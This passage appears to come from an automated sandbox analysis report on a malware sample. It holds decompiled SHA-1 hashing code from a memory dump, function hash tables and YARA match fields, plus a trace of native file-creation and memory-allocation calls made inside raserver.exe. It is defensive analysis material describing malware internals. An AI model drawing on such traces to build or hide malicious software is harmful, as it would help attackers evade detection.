				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}
































































                                                                        0x00408c7b
                                                                        0x00408c7f
                                                                        0x00408c81
                                                                        0x00408c81
                                                                        0x00408c84
                                                                        0x00408ca6
                                                                        0x00408ccc
                                                                        0x00408cf2
                                                                        0x00408d14
                                                                        0x00408d1b
                                                                        0x00408d1e
                                                                        0x00408d21
                                                                        0x00408d2a
                                                                        0x00408d30
                                                                        0x00408d37
                                                                        0x00408d48
                                                                        0x00408d4b
                                                                        0x00408d4e
                                                                        0x00408d52
                                                                        0x00408d54
                                                                        0x00408d56
                                                                        0x00408d5f
                                                                        0x00408d62
                                                                        0x00408d65
                                                                        0x00408d70
                                                                        0x00408d76
                                                                        0x00408d78
                                                                        0x00408d78
                                                                        0x00408d7b
                                                                        0x00408d7e
                                                                        0x00408d7e
                                                                        0x00408d83
                                                                        0x00408d85
                                                                        0x00408d88
                                                                        0x00408d8b
                                                                        0x00408d91
                                                                        0x00408d94
                                                                        0x00408d97
                                                                        0x00408da0
                                                                        0x00408da6
                                                                        0x00408daf
                                                                        0x00408dbe
                                                                        0x00408dc5
                                                                        0x00408dc8
                                                                        0x00408dcb
                                                                        0x00408dd4
                                                                        0x00408dd7
                                                                        0x00408dda
                                                                        0x00408df2
                                                                        0x00408df9
                                                                        0x00408dfb
                                                                        0x00408dfe
                                                                        0x00408e01
                                                                        0x00408e0a
                                                                        0x00408e11
                                                                        0x00408e14
                                                                        0x00408e17
                                                                        0x00408e26
                                                                        0x00408e2d
                                                                        0x00408e30
                                                                        0x00408e33
                                                                        0x00408e3c
                                                                        0x00408e46
                                                                        0x00408e49
                                                                        0x00408e55
                                                                        0x00408e58
                                                                        0x00408e5f
                                                                        0x00408e62
                                                                        0x00408e65
                                                                        0x00408e6a
                                                                        0x00408e6d
                                                                        0x00408e76
                                                                        0x00408e87
                                                                        0x00408e8a
                                                                        0x00408e8d
                                                                        0x00408e94
                                                                        0x00408e97
                                                                        0x00408e9a
                                                                        0x00408e9d
                                                                        0x00408e9f
                                                                        0x00408ea2
                                                                        0x00408ea5
                                                                        0x00408eae
                                                                        0x00408eb3
                                                                        0x00408eb3
                                                                        0x00408ec8
                                                                        0x00408ecb
                                                                        0x00408ece
                                                                        0x00408ed5
                                                                        0x00408ed8
                                                                        0x00408edb
                                                                        0x00408ef0
                                                                        0x00408ef7
                                                                        0x00408efa
                                                                        0x00408efe
                                                                        0x00408f01
                                                                        0x00408f06
                                                                        0x00408f09
                                                                        0x00408f18
                                                                        0x00408f1b
                                                                        0x00408f22
                                                                        0x00408f25
                                                                        0x00408f28
                                                                        0x00408f2b
                                                                        0x00408f2e
                                                                        0x00408f36
                                                                        0x00408f44
                                                                        0x00408f47
                                                                        0x00408f4a
                                                                        0x00408f4a
                                                                        0x00408f51
                                                                        0x00408f54
                                                                        0x00408f57
                                                                        0x00408f5f
                                                                        0x00408f6d
                                                                        0x00408f70
                                                                        0x00408f77
                                                                        0x00408f7a
                                                                        0x00408f7d
                                                                        0x00408f80
                                                                        0x00408f83
                                                                        0x00408f8c
                                                                        0x00408f93
                                                                        0x00408f93
                                                                        0x00408f99
                                                                        0x00408fb2
                                                                        0x00408fb5
                                                                        0x00408fbc
                                                                        0x00408fbf
                                                                        0x00408fc2
                                                                        0x00408fd4
                                                                        0x00408fde
                                                                        0x00408fe1
                                                                        0x00408fea
                                                                        0x00408fed
                                                                        0x00408ff4
                                                                        0x00408ff7
                                                                        0x00408ffd
                                                                        0x00409010
                                                                        0x00409017
                                                                        0x0040901a
                                                                        0x0040901d
                                                                        0x00409020
                                                                        0x00409029
                                                                        0x0040902c
                                                                        0x0040903f
                                                                        0x00409042
                                                                        0x0040904c
                                                                        0x0040904f
                                                                        0x00409051
                                                                        0x0040905a
                                                                        0x0040905d
                                                                        0x00409070
                                                                        0x00409076
                                                                        0x00409079
                                                                        0x00409080
                                                                        0x00409082
                                                                        0x00409085
                                                                        0x00409088
                                                                        0x0040908b
                                                                        0x0040908e
                                                                        0x00409091
                                                                        0x0040909a
                                                                        0x0040909f
                                                                        0x004090a2
                                                                        0x004090a2
                                                                        0x004090b5
                                                                        0x004090b8
                                                                        0x004090bb
                                                                        0x004090c2
                                                                        0x004090c5
                                                                        0x004090c8
                                                                        0x004090cb
                                                                        0x004090de
                                                                        0x004090e1
                                                                        0x004090ec
                                                                        0x004090ef
                                                                        0x004090fb
                                                                        0x004090fe
                                                                        0x00409104
                                                                        0x00409107
                                                                        0x0040910a
                                                                        0x00409111
                                                                        0x00409121
                                                                        0x00409124
                                                                        0x0040912a
                                                                        0x0040912d
                                                                        0x00409134
                                                                        0x00409136
                                                                        0x00409139
                                                                        0x0040913c
                                                                        0x0040913f
                                                                        0x00409142
                                                                        0x00409149
                                                                        0x00409158
                                                                        0x0040915b
                                                                        0x00409162
                                                                        0x00409165
                                                                        0x00409168
                                                                        0x0040916b
                                                                        0x0040916e
                                                                        0x00409171
                                                                        0x00409174
                                                                        0x0040917d
                                                                        0x0040918e
                                                                        0x00409196
                                                                        0x0040919c
                                                                        0x0040919f
                                                                        0x004091a1
                                                                        0x004091a4
                                                                        0x004091a7
                                                                        0x004091b4

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (
                                                                        • API String ID: 0-3887548279
                                                                        • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                        • Instruction ID: f1d44c302487b103660306cd6987bb60b95c699b99aa7ff381766033f9a4755f
                                                                        • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                        • Instruction Fuzzy Hash: 6E022DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402FB0, Relevance: .4, Instructions: 435COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                        • Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
                                                                        • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                        • Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041C58A, Relevance: .2, Instructions: 176COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a6761243c807f8599106f1ff6191d804287885db2ddfde14bc8d2be766b5794b
                                                                        • Instruction ID: 4156fa8b997677385276b44771148257f16ae5edc97a2b716fcf7a3cd11c15bc
                                                                        • Opcode Fuzzy Hash: a6761243c807f8599106f1ff6191d804287885db2ddfde14bc8d2be766b5794b
                                                                        • Instruction Fuzzy Hash: 7E812232848391DFEB05DF78E8966463FB1F746320708068ED9A25B1D2D77424BACF86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402D90, Relevance: .2, Instructions: 165COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                        • Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
                                                                        • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                        • Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402D88, Relevance: .2, Instructions: 162COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 660dbcd9d4b525f84ec70345b48c30eb786b97a7a498ec4d560fc54d98703e81
                                                                        • Instruction ID: 9178a6781057fc96b23a6498efdafe696857250051c9cd61765f4f9f700f33a7
                                                                        • Opcode Fuzzy Hash: 660dbcd9d4b525f84ec70345b48c30eb786b97a7a498ec4d560fc54d98703e81
                                                                        • Instruction Fuzzy Hash: 3F5182B3E14A214BD318CE09CC40631B792FFC8312B5B81BEDD199B397CA74E9529A90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041B8FB, Relevance: .1, Instructions: 134COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3bf46696de6abd3ccb1d8624ddecd45027ed840a9774cc2ce9ff8440a1e8a6b3
                                                                        • Instruction ID: fc1872c2ed11fff5d620cbbd4c11b470343491c460d1f6761d842a8916d4cbe2
                                                                        • Opcode Fuzzy Hash: 3bf46696de6abd3ccb1d8624ddecd45027ed840a9774cc2ce9ff8440a1e8a6b3
                                                                        • Instruction Fuzzy Hash: C1617372818796CFD716CF38DA8A6823FF1F712324748824FD4A2A7496C7782556CF89
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040102E, Relevance: .1, Instructions: 109COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1d18f76931eec532c383dcf8885f4cbc52efa6621afacd448ea28532cd0a7bc9
                                                                        • Instruction ID: 61cd57d2072392fc7a97888852fd84d8bcbb586f46090e9864607dc025de2440
                                                                        • Opcode Fuzzy Hash: 1d18f76931eec532c383dcf8885f4cbc52efa6621afacd448ea28532cd0a7bc9
                                                                        • Instruction Fuzzy Hash: A831A0116587F14ED31E836D08B9675AEC18E9720174EC2FEDADA6F3F3C0888408D3A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401030, Relevance: .1, Instructions: 108COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                        • Instruction ID: 9ce4faf4bd6c29c48d5e9242fd1ccb7de96948774e055271f7c113e60250bd75
                                                                        • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                        • Instruction Fuzzy Hash: 203180116596F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041B57A, Relevance: .1, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 18512cc22602838dbd03c0e1e7066ad10e8d7355b100ff0c0411712c92d1e501
                                                                        • Instruction ID: 361f27f1a81cd2c9f6af134fa7674f1d50b964825dd26805f452c38648ee03c4
                                                                        • Opcode Fuzzy Hash: 18512cc22602838dbd03c0e1e7066ad10e8d7355b100ff0c0411712c92d1e501
                                                                        • Instruction Fuzzy Hash: 1D4133739187A2CFD719DF38DA9A7813FB1F791320749834ECA9057092C738256ADB89
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00406A98, Relevance: .0, Instructions: 15COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3ce71f0b18b192eead0bdd58e6451f53a7d4a471ea843e5b1a893e27d91b5b14
                                                                        • Instruction ID: b04cdd777b13eb029ad178d631aa259a83c5c41265c149a7b635c52cc29cf17c
                                                                        • Opcode Fuzzy Hash: 3ce71f0b18b192eead0bdd58e6451f53a7d4a471ea843e5b1a893e27d91b5b14
                                                                        • Instruction Fuzzy Hash: DBC08C32D01A080BD6208D6CA9862B0FBB5E757270F40375FE80BE7254894AD4926248
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00415699, Relevance: .0, Instructions: 14COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b0e20c8c03abd7a7042ea1e45eea7a4d3f6bbaece8f5276b37b475447ada751d
                                                                        • Instruction ID: a99fd93fac32b6c5bd72fbc59389829e61a1defbd79046b1edcb9b2863031fe3
                                                                        • Opcode Fuzzy Hash: b0e20c8c03abd7a7042ea1e45eea7a4d3f6bbaece8f5276b37b475447ada751d
                                                                        • Instruction Fuzzy Hash: 04B0921BA868285500106C5E78800B9E3A4D8CB229E10F3978D1CB32002406C81E80D8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00415852, Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3511af067845206802aa604ab3289e8b3ce08807f0d58701d70e4a09b83e750c
                                                                        • Instruction ID: 6c37e1900271d968a9ebdac2dec6771b5c852c920dd60c45b272dc951f77e813
                                                                        • Opcode Fuzzy Hash: 3511af067845206802aa604ab3289e8b3ce08807f0d58701d70e4a09b83e750c
                                                                        • Instruction Fuzzy Hash: 6FA0023BF864545464581C8DBC616B6D334D1C307AE243273D71CF3400C007C025115C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Analysis Process: raserver.exe PID: 4564 Parent PID: 3472 raserver.exeCOMMON

                                                                        Executed Functions

                                                                        Function 009B81D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,009B3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,009B3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 009B821D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID: .z`
                                                                        • API String ID: 823142352-1441809116
                                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                        • Instruction ID: 8cd122138e4c699fa90a962662c6f887db185d42c25c34d866705e47f816fc18
                                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                        • Instruction Fuzzy Hash: D0F0B2B2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009B8222, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,009B3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,009B3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 009B821D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID: .z`
                                                                        • API String ID: 823142352-1441809116
                                                                        • Opcode ID: a35495c9fa1f261774ecf75b376189285d3fef53a1587834856adc40d1aeb616
                                                                        • Instruction ID: 97149f3f29f6733363e5ccb241ec5f9571f08d5f62b460c66a4f07cace8ff499
                                                                        • Opcode Fuzzy Hash: a35495c9fa1f261774ecf75b376189285d3fef53a1587834856adc40d1aeb616
                                                                        • Instruction Fuzzy Hash: CCF0F8B2218148AF8B44CF9CDD94CEB77ADEB8C210B14465CFA5CC7204C631E802CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009B83AA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31memorynativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,009A2D11,00002000,00003000,00000004), ref: 009B83E9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID: 6HCU
                                                                        • API String ID: 2167126740-1255677348
                                                                        • Opcode ID: 5ca195d08c7bb1ddaf8ea49b38e0745b3ab2388370f426f41256d273ac7716ab
                                                                        • Instruction ID: 5831bfc5e4e6622a789e7ab5a5d901c1dda8525ef5c78c66d7fa91e8da93f175
                                                                        • Opcode Fuzzy Hash: 5ca195d08c7bb1ddaf8ea49b38e0745b3ab2388370f426f41256d273ac7716ab
                                                                        • Instruction Fuzzy Hash: D8F0F8B5200208ABCB14DF98CC81EEB77ADAF8C750F158549BE5897251D630E911CBE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009B8280, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
